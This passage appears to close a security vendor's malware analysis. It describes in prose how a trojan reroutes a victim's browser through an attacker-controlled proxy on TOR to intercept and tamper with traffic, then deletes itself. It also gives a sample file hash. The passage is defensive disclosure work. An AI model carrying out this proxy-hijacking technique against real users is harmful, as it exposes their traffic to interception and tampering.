As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.

When done, the malware will delete itself.

All is left to say: beware of Trojans bearing gifts, especially if they ask for your root password.




Sample hash – 7819ae7d72fa045baa77e9c8e063a69df439146b27f9c3bb10aef52dcc77c145







Check Point Protections